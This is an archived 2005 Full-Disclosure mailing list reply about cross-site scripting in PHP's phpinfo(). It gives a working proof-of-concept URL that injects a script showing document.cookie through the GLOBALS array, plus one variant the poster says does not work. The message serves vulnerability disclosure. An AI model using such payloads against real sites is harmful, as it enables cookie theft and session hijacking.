[Full-disclosure] Advisory 18/2005: PHP Cross Site Scripting (XSS)XVulnerability in phpinfo()
phole at hushmail.com
phole at hushmail.com
Thu Nov 3 15:06:10 GMT 2005
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
great Work
PoC:
phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
this Don't Work:
phpinfo.php?test=<script>alert(document.cookie);</script>
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4
wkYEARECAAYFAkNqJ2EACgkQ3APBCuix8ZmWRACgs0IvvixY6zfmkpJ/9APUtgPLFfgA
oJgOYQ4jbwGaTcJV95ZVyiAQwMXF
=zYsZ
-----END PGP SIGNATURE-----
Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
Full-Disclosure is hosted and sponsored by Secunia.